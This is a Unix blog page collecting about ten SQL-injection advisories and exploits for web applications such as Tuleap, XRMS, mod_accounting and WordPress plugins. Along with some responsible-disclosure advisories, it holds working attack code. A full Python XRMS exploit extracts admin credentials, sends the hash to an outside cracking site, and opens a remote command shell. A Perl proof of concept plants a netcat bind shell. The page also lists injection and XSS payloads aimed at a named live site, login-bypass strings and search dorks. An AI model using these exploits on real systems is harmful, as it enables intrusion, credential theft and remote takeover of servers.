MondoUnix Unix, Linux, FreeBSD, BSD, GNU, Kernel , RHEL, CentOS, Solaris, AIX, HP-UX, Mac OS X, Tru64, SCO UnixWare, Xenix, HOWTO, NETWORKING, IPV6

29Oct/140

Tuleap 7.4.99.5 Blind SQL Injection

Vulnerability title: Tuleap <= 7.4.99.5 Authenticated Blind SQL Injection in Enalean Tuleap
CVE: CVE-2014-7176
Vendor: Enalean
Product: Tuleap
Affected version: 7.4.99.5 and earlier
Fixed version: 7.5
Reported by: Jerzy Kramarz
 
Details:
 
SQL injection has been found and confirmed within the software as an authenticated user. A successful attack could allow an authenticated attacker to access information such as usernames and password hashes that are stored in the database. The following URLs and parameters have been confirmed to suffer from SQL injections:
 
 
GET /plugins/docman/?group_id=100&id=16&action=search&global_txt=a<SQL Injection>&global_filtersubmit=Apply HTTP/1.1
Host: 192.168.56.108
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.56.108/plugins/docman/?group_id=100
Cookie: PHPSESSID=3pt0ombsmp0t9adujgrohv8mb6; TULEAP_session_hash=d51433e1f7c9b49079c0e5c511d64c96
Connection: keep-alive
 
 
Note: In order to exploit this vulnerability a attacker needs to be in position to access '/plugins/docman/' URN.
 
 
Further details at:
 
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-7176/
 
Copyright:
Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
 
Disclaimer:
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
 
 
###############################################################
This email originates from the systems of Portcullis
Computer Security Limited, a Private limited company, 
registered in England in accordance with the Companies 
Act under number 02763799. The registered office 
address of Portcullis Computer Security Limited is: 
Portcullis House, 2 Century Court, Tolpits Lane, Watford, 
United Kingdom, WD18 9RS.  
The information in this email is confidential and may be 
legally privileged. It is intended solely for the addressee. 
Any opinions expressed are those of the individual and 
do not represent the opinion of the organisation. Access 
to this email by persons other than the intended recipient 
is strictly prohibited.
If you are not the intended recipient, any disclosure, 
copying, distribution or other action taken or omitted to be 
taken in reliance on it, is prohibited and may be unlawful. 
When addressed to our clients any opinions or advice 
contained in this email is subject to the terms and 
conditions expressed in the applicable Portcullis Computer 
Security Limited terms of business.
###############################################################
 
#####################################################################################
This e-mail message has been scanned for Viruses and Content and cleared 
by MailMarshal.
#####################################################################################

(42)

14Oct/140

CMS Subkarma Cross Site Scripting / SQL Injection

# Multiple SQL Injection & XSS on CMS SUBKARMA
 
# Risk: High
 
# CWE number: CWE-89,CWE-79
 
# Date: 13/10/2014
 
# Vendor: www.jttel.com.tw
 
# Author: Felipe " Renzi " Gabriel
 
# Contact: renzi@linuxmail.org
 
# Tested on:  Linux Mint ; Firefox ; Sqlmap 1.0-dev-nongit-20140906
 
# Vulnerables File: news.php ; product.php ; pro_con.php
 
# Exploits: http://www.target.com/news.php?id=[XSS]
 
            http://www.target.com/product.php?cat_id=[SQLI] & [XSS]
 
            http://www.target.com/pro_con.php?id=[SQLI] & [XSS]
 
 
# PoC:      http://www.cideko.com/product.php?cat_id=18  
 
            http://www.cideko.com/pro_con.php?id=3 
 
 
--- "SQLI using SQLMAP."--- 
 
    Place: GET
    Parameter: cat_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat_id=18 AND 6427=6427
 
    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: cat_id=18 AND 7867=BENCHMARK(5000000,MD5(0x4d666b6e))
---
 
 
--- " XSS using HTML injection."---
 
    http://www.cideko.com/news.php?id=38"><marquee>XSS</marquee>
 
    http://www.cideko.com/product.php?cat_id=18"><marquee>XSS</marquee>
 
    http://www.cideko.com/pro_con.php?id=3"><marquee>XSS</marquee>
 
# Note
 
The SQL Injection on file pro_con.php parameter id, was published by Ali Pandidan.
Reference, http://cxsecurity.com/issue/WLB-2011020004 .
 
# Thank's

(96)

3Oct/140

AllMyVisitors 0.5.0 SQL Injection

AllMyVisitors0.5.0 Blind SQL Injection Vulnerability
====================================================
Author : indoushka
Vondor : http://www.php-resource.net/
Dork:    Copyright (c) 2004 by voice of web
==========================
 
SQL injection is a vulnerability that allows an attacker to alter back-end SQL statements by manipulating the user input. An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and doesn't properly filter out dangerous characters. 
 
This is one of the most common application layer attacks currently being used on the Internet. Despite the fact that it is relatively easy to protect against, there is a large number of web applications vulnerable.
This vulnerability affects /AllMyVisitors0.5.0/. 
Discovered by: Scripting (Blind_Sql_Injection.script). 
Attack details
HTTP Header input Referer was set to if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/
 
Tests performed: 
if(now()=sysdate(),sleep(2),0)/*'XOR(if(now()=sysdate(),sleep(2),0))OR'"XOR(if(now()=sysdate(),sleep(2),0))OR"*/ => 6.099 s
if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/ => 18.439 s
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ => 0.561 s
if(now()=sysdate(),sleep(4),0)/*'XOR(if(now()=sysdate(),sleep(4),0))OR'"XOR(if(now()=sysdate(),sleep(4),0))OR"*/ => 12.558 s
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ => 0.515 s
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ => 0.53 s
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ => 0.468 s
if(now()=sysdate(),sleep(4),0)/*'XOR(if(now()=sysdate(),sleep(4),0))OR'"XOR(if(now()=sysdate(),sleep(4),0))OR"*/ => 12.496 s
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ => 0.577 s
 
Insecure Cookie Handling :
 
admin.php
 
javascript:document.cookie="allmyphp_cookie=' or ' 1=1--;path=/";
 
Auth Bypass :
 
admin.php
 
 Username : azerty' or '1=1--# Real admin name
 Password : demo1 ' or ' 1=1 or ADmin or  any thing

(106)

2Oct/140

WordPress Content Audit 1.6 Blind SQL Injection

Details
================
Software: Content Audit
Version: 1.6
Homepage: http://wordpress.org/plugins/content-audit/
Advisory report: https://security.dxw.com/advisories/blind-sqli-vulnerability-in-content-audit-could-allow-a-privileged-attacker-to-exfiltrate-password-hashes/
CVE: CVE-2014-5389
CVSS: 3.6 (Low; AV:N/AC:H/Au:S/C:P/I:N/A:P)
 
Description
================
Blind SQLi vulnerability in Content Audit could allow a privileged attacker to exfiltrate password hashes
 
Vulnerability
================
An attacker with an admin account is able to add arbitrary text in the “Audited content types” option by using a DOM inspector to modify the value of a checkbox field. This text is then inserted into an SQL query and executed as part of a daily wp-cron job.
The fact that this is run only once a day makes it rather minor. An attacker would potentially need to poll /wp-cron.php repeatedly for 24 hours until they got the first result. As blind SQL injection attacks are usually done by comparing the first character to all possible characters – one at a time, until a match is found – it would take a very long time to exfiltrate useful data.
However, we don’t discount the possibility that someone cleverer than us could figure out a more practical attack.
 
Proof of concept
================
Steps an attacker may take:
 
Visit /wp-admin/options-general.php?page=content-audit
Check an “Audited content types” checkbox
Right-click that checkbox and select “Inspect element”
Set the value attribute of the element to something which does sleep(5) if the first byte of the admin’s password hash is ‘a’ or sleep(10) otherwise
Press “Update Options”
Poll /wp-cron.php repeatedly until it takes longer than 5 seconds and record how long the request took
Repeat
 
Steps to take to verify that this issue exists:
 
Visit /wp-admin/options-general.php?page=content-audit
Check a “Audited content types” checkbox
Right-click that checkbox and select “Inspect element”
Set the value attribute of the element to “‘” (a single apostrophe)
Press “Update Options”
Add “add_action(‘init’, ‘content_audit_mark_outdated’);” to content-audit-schedule.php somewhere and load any page
This error should occur: “WordPress database error You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘2013-08-12′”
If you replace “$oldposts = $wpdb->get_results” with “echo” on line 134 of content-audit-schedule.php you’ll notice that it’s inserting the ‘ unescaped – which means that you can insert whatever you like
 
 
Mitigations
================
You should update to version 1.62.
 
Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/
 
Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.
 
This vulnerability will be published if we do not receive a response to this report with 14 days.
 
Timeline
================
 
2014-08-11 – Discovered
2014-08-21 – Requested author email address via a contact form
2014-08-27 – Reported to author via email
2014-09-22 – No response from author; reminder sent
2014-09-23 – Author responded
2014-09-24 – Fix released
2014-10-01 – Published
 
 
 
Discovered by dxw:
================
Tom Adams
Please visit security.dxw.com for more information.

(131)

28Aug/140

XRMS Blind SQL Injection / Command Execution

#######################
# XRMS Blind SQLi via $_SESSION poisoning, then command exec
#########################
 
import urllib
import urllib2
import time
import sys
 
usercharac = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','@','.','_','-','1','2','3','4','5','6','7','8','9','0']
userascii = [97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 64, 46, 95, 45, 49, 50, 51, 52, 53, 54, 55, 56, 57, 48]
def banner():
  print """      ____                                      
     / __/_  ______ _  _  ___________ ___  _____
    / /_/ / / / __ `/ | |/_/ ___/ __ `__ \/ ___/
   / __/ /_/ / /_/ / _>  </ /  / / / / / (__  ) 
  /_/  \__,_/\__, (_)_/|_/_/  /_/ /_/ /_/____/  
               /_/                              
  [+] fuq th3 w0rld, fuq ur m0m!\n"""
 
def usage():
  print "  [+] Info: Remote Command Execution via $_SESSION poisoning to SQLi to RCE"
  print "  [+] Example:"
  print "  [+] python " + sys.argv[0] + " domain.to/xrms"
  quit()
 
def sendhashaway(hash):
  print " [+] Sending hash to icrackhash.com to be cracked."
  data = None
  headers = { 'Referer' : 'http://icrackhash.com/?mdhash=' + hash + '&type=MD5','User-Agent' : 'Mozilla','X-Requested-With' : 'XMLHttpRequest'}
  url = 'http://www.icrackhash.com/?mdhash=' + hash + '&type=MD5'
  gh = urllib2.Request(url,data,headers)
  gh2 = urllib2.urlopen(gh)
  output = gh2.read()
  plaintext = getpositions(output,'<td><small><strong>','</strong>')
  print " [-] Plaintext of hash: " +plaintext + "\n"
  return plaintext
 
def username(length):
  length = length + 1
  duser = []
  #1) UNION ALL SELECT 1,2,3,4,5,6,7,8,9-- -
  found = 0
  i = 1
  payload1 = "1) UNION ALL SELECT 1,2,3,4,5,6,7,8,IF(SUBSTRING(username,"
  payload2 = ",1)=CHAR("
  payload3 = "),BENCHMARK(5000000,MD5(0x34343434)),NULL) FROM users-- -"
        for i in range(1,length):
    found = 0
    while(found != 1):
      for f in range(0,len(userascii)):
        class LeHTTPRedirectHandler(urllib2.HTTPRedirectHandler):
          def http_error_302(self, req, fp, code, msg, headers):
            infourl = urllib2.addinfourl(fp, headers, req.get_full_url())
            infourl.status = code
            infourl.code = code
            return infourl
          http_error_300 = http_error_302    
        class HeadRequest(urllib2.Request):
          def get_method(self):
            return "POST"
        payload = payload1 + str(i) + payload2 + str(userascii[f]) + payload3
        data = urllib.urlencode([('user_id',payload)])
        url = 'http://'+domain+'/plugins/webform/new-form.php'
        opener = urllib2.build_opener(LeHTTPRedirectHandler)
        req = HeadRequest(url,data)
        prepare = opener.open(req)
        cookie1 = prepare.info()
        cookie2pos1 = str(cookie1).find('PHPSESSID')
        cookie2pos2 = str(cookie1).find("\n",cookie2pos1)
        line = str(cookie1)[cookie2pos1:cookie2pos2 - 9]
        line = 'XRMS' + line[9:]
        url = 'http://'+domain+'/plugins/useradmin/fingeruser.php'
        headers = { 'Cookie' : line }
        data = None
        start = time.time()
        get = urllib2.Request(url,data,headers)
        get.get_method = lambda: 'HEAD'
        try:
          execute = urllib2.urlopen(get)
        except:
          pass
        elapsed = (time.time() - start)
        if(elapsed > 1):
          print "  Character found. Character is: " + usercharac[f]
          duser.append(usercharac[f])
          found = 1
  return duser
 
def getusernamelength():
  found = 0
  i = 1
  payload1 = "1) UNION ALL SELECT 1,2,3,4,5,6,7,8,IF(LENGTH(username) = '"
  payload2 = "',BENCHMARK(50000000,MD5(0x34343434)),NULL) FROM users-- -"
  while (found != 1): 
    class LeHTTPRedirectHandler(urllib2.HTTPRedirectHandler):
      def http_error_302(self, req, fp, code, msg, headers):
        infourl = urllib2.addinfourl(fp, headers, req.get_full_url())
        infourl.status = code
        infourl.code = code
        return infourl
      http_error_300 = http_error_302    
    class HeadRequest(urllib2.Request):
      def get_method(self):
        return "POST"
    payload = payload1 + str(i) + payload2
    data = urllib.urlencode([('user_id',payload)])
    url = 'http://'+domain+'/plugins/webform/new-form.php'
    opener = urllib2.build_opener(LeHTTPRedirectHandler)
    req = HeadRequest(url,data)
    prepare = opener.open(req)
    cookie1 = prepare.info()
    cookie2pos1 = str(cookie1).find('PHPSESSID')
    cookie2pos2 = str(cookie1).find("\n",cookie2pos1)
    line = str(cookie1)[cookie2pos1:cookie2pos2 - 9]
    line = 'XRMS' + line[9:]
    url = 'http://'+domain+'/plugins/useradmin/fingeruser.php'
    headers = { 'Cookie' : line }
    data = None
    start = time.time()
    get = urllib2.Request(url,data,headers)
    get.get_method = lambda: 'HEAD'
    try:
      execute = urllib2.urlopen(get)
    except:
      pass
    elapsed = (time.time() - start)
    if(elapsed > 1):
      print "  Length found at position: " + str(i)
      found = 1
      length = i
      return length
    i = i + 1
 
def password(length):
  length = length + 1
  dpassword = []
  #1) UNION ALL SELECT 1,2,3,4,5,6,7,8,9-- -
  found = 0
  i = 1
  payload1 = "1) UNION ALL SELECT 1,2,3,4,5,6,7,8,IF(SUBSTRING(password,"
  payload2 = ",1)=CHAR("
  payload3 = "),BENCHMARK(5000000,MD5(0x34343434)),NULL) FROM users-- -"
        for i in range(1,length):
    found = 0
    while(found != 1):
      for f in range(0,len(userascii)):
        class LeHTTPRedirectHandler(urllib2.HTTPRedirectHandler):
          def http_error_302(self, req, fp, code, msg, headers):
            infourl = urllib2.addinfourl(fp, headers, req.get_full_url())
            infourl.status = code
            infourl.code = code
            return infourl
          http_error_300 = http_error_302    
        class HeadRequest(urllib2.Request):
          def get_method(self):
            return "POST"
        payload = payload1 + str(i) + payload2 + str(userascii[f]) + payload3
        data = urllib.urlencode([('user_id',payload)])
        url = 'http://'+domain+'/plugins/webform/new-form.php'
        opener = urllib2.build_opener(LeHTTPRedirectHandler)
        req = HeadRequest(url,data)
        prepare = opener.open(req)
        cookie1 = prepare.info()
        cookie2pos1 = str(cookie1).find('PHPSESSID')
        cookie2pos2 = str(cookie1).find("\n",cookie2pos1)
        line = str(cookie1)[cookie2pos1:cookie2pos2 - 9]
        line = 'XRMS' + line[9:]
        url = 'http://'+domain+'/plugins/useradmin/fingeruser.php'
        headers = { 'Cookie' : line }
        data = None
        start = time.time()
        get = urllib2.Request(url,data,headers)
        get.get_method = lambda: 'HEAD'
        try:
          execute = urllib2.urlopen(get)
        except:
          pass
        elapsed = (time.time() - start)
        if(elapsed > 1):
          print "  Character found. Character is: " + usercharac[f]
          dpassword.append(usercharac[f])
          found = 1
  return dpassword
 
def login(domain,user,password):
  cookie = "XRMS=iseeurgettinown4d"
  url = 'http://'+domain+'/login-2.php'
  headers = { 'Cookie' : cookie }
  data = urllib.urlencode([('username',user),('password',password)])
  a1 = urllib2.Request(url,data,headers)
  a2 = urllib2.urlopen(a1)
  output = a2.read()
  if output.find('PEAR.php') > 0:
    print "  [+] Logged In"
 
def commandexec(domain,command):
  cookie = "XRMS=iseeurgettinown4d"
  cmd = urllib.urlencode([("; echo '0x41';" + command + ";echo '14x0';",None)])
  headers = { 'Cookie' : cookie }
  data = None
  url = 'http://'+domain+'/plugins/useradmin/fingeruser.php?username=' + cmd
  b1 = urllib2.Request(url,data,headers)
  b2 = urllib2.urlopen(a1)
  output = b2.read()
  first = output.find('0x41') + 4
  last = output.find('14x0') - 4
  return output[first:last]
 
banner()
if len(sys.argv) < 2:
  usage()
domain = sys.argv[1]
print "  [+] Grabbing username length"
length = getusernamelength()
print "  [+] Grabbing username characters"
tmpuser = username(length)
adminusr = "".join(tmpuser)
print "  [+] Grabbing password hash"
tmppass =  password(32)
admpass = "".join(tmppass)
print " [+] Admin username: "+ adminusr
print "  [+] Admin password hash: " + admpass
plain = sendhashaway(admpass)
login(domain,adminusr,plain)
while(quit != 1):
  cmd = raw_input('  [+] Run a command: ')
  if cmd == 'quit':
    print "  [-] Hope you had fun :)"
    quit = 1
  if cmd != 'quit':
    print "  [+] "+ commandexec(domain,cmd)

(648)

28Oct/130

WordPress WP Realty Blind SQL Injection

$$$$$$\      $$\   $$\     $$$$$$\ 
$$  __$$\     $$ |  $$ |   $$  __$$\
$$ /  \__|    $$ |  $$ |   $$ /  \__|
$$ |$$$$\     $$$$$$$$ |   \$$$$$$\ 
$$ |\_$$ |    $$  __$$ |    \____$$\
$$ |  $$ |    $$ |  $$ |   $$\   $$ |
\$$$$$$  |$$\ $$ |  $$ |$$\\$$$$$$  |
 \______/ \__|\__|  \__|\__|\______/
 
# Exploit Title: Wordpress - wp-realty - MySQL Time Based Injection
# Google Dork: inurl:"/wp-content/plugins/wp-realty/"
# Vendor: http://wprealty.org/
# Date: 10/08/2013
# Exploit Author: Napsterakos
 
 
Link: http://localhost/wordpress/wp-content/plugins/wp-realty/
 
Exploit: http://localhost/wordpress/wp-content/plugins/wp-realty/index_ext.php?action=contact_friend&popup=yes&listing_id=[SQLi]
 
 
Credits to: Greek Hacking Scene

(852)

29Sep/130

mod_accounting 0.5 Blind SQL Injection

   - Affected Vendor: http://sourceforge.net/projects/mod-acct/files/
   - Affected Software: mod_accounting
   - Affected Version: 0.5. Other earlier versions may be affected.
   - Issue type: Blind SQL injection
   - Release Date: 20 Sep 2013
   - Discovered by: Eldar "Wireghoul" Marcussen
   - CVE Identifier: CVE-2013-5697
   - Issue status: Abandoned software, no patch available
 
Summary
 
mod_accounting is a traffic accounting module for Apache 1.3.x which
records traffic numbers in a database. Both MySQL and PostgreSQL database
types are supported. It supports arbitrary database designs as traffic
recording is performed via a user defined query in the Apache configuration
using placeholders for received values. The following is an example
configuration:
 
<VirtualHost _default_:*>
DocumentRoot "/var/www/"
Options Indexes
AccountingQueryFmt "INSERT INTO accounting VALUES( current_time, %r, %s,
'%u', '%h' );"
AccountingDatabase accounting
AccountingDatabaseDriver postgres
AccountingDBHost localhost 5432
AccountingLoginInfo acct acct
</VirtualHost>
 
As user supplied values are not sanitised before being used in the
placeholder values it is possible for an attacker to supply malicous values
to perform blind SQL injection.
 
 
Description
 
The SQL injection occurs due to a user supplied HTTP header being used in
the query without sanitisation. The module uses a simple string
concatination approach to modify the placeholders in the user defined query
before sending it to the database. This code can be located in
mod_accounting.c:
 
409: // build the query string from the template
410: while( ptr ) {
411:     char *next;
412:
413:     next = strchr( ptr, '%' );
414:
415:     if( next ) {
416:         char       tmp[ 2 ];
417:
418:         *next++ = '\0';
419:
420:         switch( *next++ ) {
421:
422:             case 'h':
423:                 query = ap_pstrcat( p, query, ptr, cfg->ServerName ?
cfg->ServerName : "-", NULL );
424:                 break;
425:
426:             case 's':
427:                 query = ap_pstrcat( p, query, ptr, sent, NULL );
428:                 break;
429:
430:             case 'r':
431:                 query = ap_pstrcat( p, query, ptr, recvd, NULL );
432:                 break;
433:
434:             case 'u':
435:                 query = ap_pstrcat( p, query, ptr, get_user( r ), NULL
);
436:                 break;
437:
438:             default:
439:                 tmp[0] = next[ -1 ];
440:                 tmp[1] = '\0';
441:
442:                 query = ap_pstrcat( p, query, ptr, tmp, NULL );
443:                 break;
444:         }
445:
446:         next[ -2 ] = '%';
447:
448:     } else
449:         query = ap_pstrcat( p, query, ptr, NULL );
450:
451:     ptr = next;
452: }
453:
454: ( *DBDrivers[ cfg->DBDriver ].Query )( cfg, server, p, query );
455:
456: cfg->Received = cfg->Sent = 0;
 
It is important to note that the database query takes place after the page
has been served, hence there is no easy way to determine if a particular
injection method was successful apart from using an out of band approach.
However, as the injection occurs in an insert statement it is likely that
the successful injection vector is one of about a handful of likely
candidates.
 
 
Impact
 
An attacker is only limited by the capabilities of the database
configuration and may be able to read, add, alter or delete data from your
database(s), read or write arbitrary files or even execute commands on the
server given a privileged database account.
 
 
Proof of Concept
 
root@bt:~/sploit-dev# cat mod_accounting-rce.pl
#!/usr/bin/perl
# PoC of blind SQL injection in the mod_accounting/0.5 Apache module
# Injection can occur via the Host header
# As the injection occurs in a user defined insert statement a bit of trial
and error is required
# Database operations occurs asyncronous to page response so timing attacks
wont work
# This one is completely blind
# DB can be mysql or postgres, this PoC only covers postgres
# PoC executes netcat to listen on port 4444 (requires dba privileges)
use IO::Socket::INET;
 
print "#----------------------------------------------#\n";
print "| mod_accounting/0.5 PoC exploit by \@Wireghoul |\n";
print "|          www.justanotherhacker.com           |\n";
print "#----------Command execution via SQLi----------#\n";
print "[*] Enumerating blind injection vectors:\n";
 
my @endings = ("'));", '"));', "));", "');", '");', ");", "';", '";',";");
# These should terminate most insert statements
#my @endings = ( "');" );
my $shell = 'nc -lnp 4444 -e /bin/sh';
my $cnt = 0;
my $content = "CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS
'/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT; SELECT system('$shell');";
foreach $end (@endings) {
  $cnt++;
  my $sock = IO::Socket::INET->new("$ARGV[0]:$ARGV[1]") or die "Unable to
connect to $ARGV[0]:$ARGV[1]: $!\n";
  my $str = "GET / HTTP/1.1\r\nHost: $ARGV[0]$cnt$end $content --
\r\n\r\n"; # from mysql.user into outfile '/tmp/pocpoc$cnt.txt'; --
\r\n\r\n";
  print "[-] Trying $end\n";
  print $sock $str;
  #print "Sent $end\n";
  close ($sock);
}
print "[*] Done, remote server should have executed $shell\n";
 
 
Execution of PoC:
--------------------------------------------------
root@bt:~/sploit-dev# nc 192.168.58.138 4444
(UNKNOWN) [192.168.58.138] 4444 (?) : Connection refused
root@bt:~/sploit-dev# perl mod_accounting-rce.pl 192.168.58.138 80
#----------------------------------------------#
| mod_accounting/0.5 PoC exploit by @Wireghoul |
|          www.justanotherhacker.com           |
#----------Command execution via SQLi----------#
[*] Enumerating blind injection vectors:
[-] Trying '));
[-] Trying "));
[-] Trying ));
[-] Trying ');
[-] Trying ");
[-] Trying );
[-] Trying ';
[-] Trying ";
[-] Trying ;
[*] Done, remote server should have executed nc -lnp 4444 -e /bin/sh
root@bt:~/sploit-dev# nc 192.168.58.138 4444
pwd
/var/lib/postgres/data/base/17142
id
uid=101(postgres) gid=104(postgres) groups=104(postgres)
hostname
sarge
^C
 
Solution
 
As the module is no longer supported, discontinue the use of this module.
 
 
Response Timeline
 
   - 03/09/2013 - Vendor notified
   - 03/09/2013 - Vendor acknowledge vulnerability
   - 04/09/2013 - Project download removed and website updated to reflect
   new status
   - 20/09/2013 - Advisory released

(607)

24Sep/130

Joomla JVideoClip Blind SQL Injection

================================================================================
Joomla Component com_jvideoclip (cid|uid|id) Blind SQL Injection / SQL Injection
================================================================================
 
Author          : SixP4ck3r
Email & msn     : SixP4ck3r@Bolivia.com
Date            : 21 Sept 2013
Critical Lvl    : Medium
Impact          : Exposure of sensitive information
Where           : From Remote
Blog      : http://sixp4ck3r.blogspot.com/
Credits        : To my love!
Dork           : inurl:com_jvideoclip
 
---------------------------------------------------------------------------
 
[Exploting..Bug..Demo..]
 
http://example/index.php?option=com_jvideoclip&view=search&type=user&uid=[SQLi]&Itemid=6
 
[Blind SQL Injection]
http://example/index.php?option=com_jvideoclip&view=search&type=user&uid=[bSQLi]&Itemid=6
 
---------------------------------------------------------------------------
 
SixP4ck3r from Bolivia
___EOF____

(791)

29Mar/130

PsychoStats 3.2.2b Blind SQL Injection

Exploit Title :  PsychoStats awards.php blind SQL Injection
==============
Date: 27/03/2013 00:50
=====
Author: Mohamed from ALG
======
Vendor or Software Link:http://psychostats.us/
=======================
Version: 3.2.2b
========
Category: webapps
=========
Google Keywords: "Powered by PsychoStats 3.2.2b"
===============
contact: senderberd[at]gmail.com
========
 
exploit:
========
 
http://server/awards.php?d=YYYY-MM-DD{Inject hier your blind SQL injection}
 
 
Use Havij to easy exploit
Enjoy
 
 
S.Th To a El Koyot
 
end

(512)

24Feb/130

Rix4Web Portal Remote Blind SQL Injection

################################################
### Exploit Title: Rix4Web Portal Remote Blind SQL Injection Vulnerability
### Date: 02/23/2013 
### Author: L0n3ly-H34rT 
### Contact: l0n3ly_h34rt@hotmail.com 
### My Site: http://se3c.blogspot.com/ 
### Vendor Link: http://www.rix4web.com/
### Software Link: http://www.traidnt.net/vb/traidnt2230161/
### Tested on: Linux/Windows 
################################################
 
# AND time-based blind In POST:
 
POST http://127.0.0.1/rix/add-site.php?do=addnew&go=add
 
cat_id=1&dir_link=http://www.google.com/' AND SLEEP(5) AND 'test'='test&dir_short=1&dir_title=Mr.
 
# Just inject : dir_link
 
################################################
 
# Greetz To My Friendz

(576)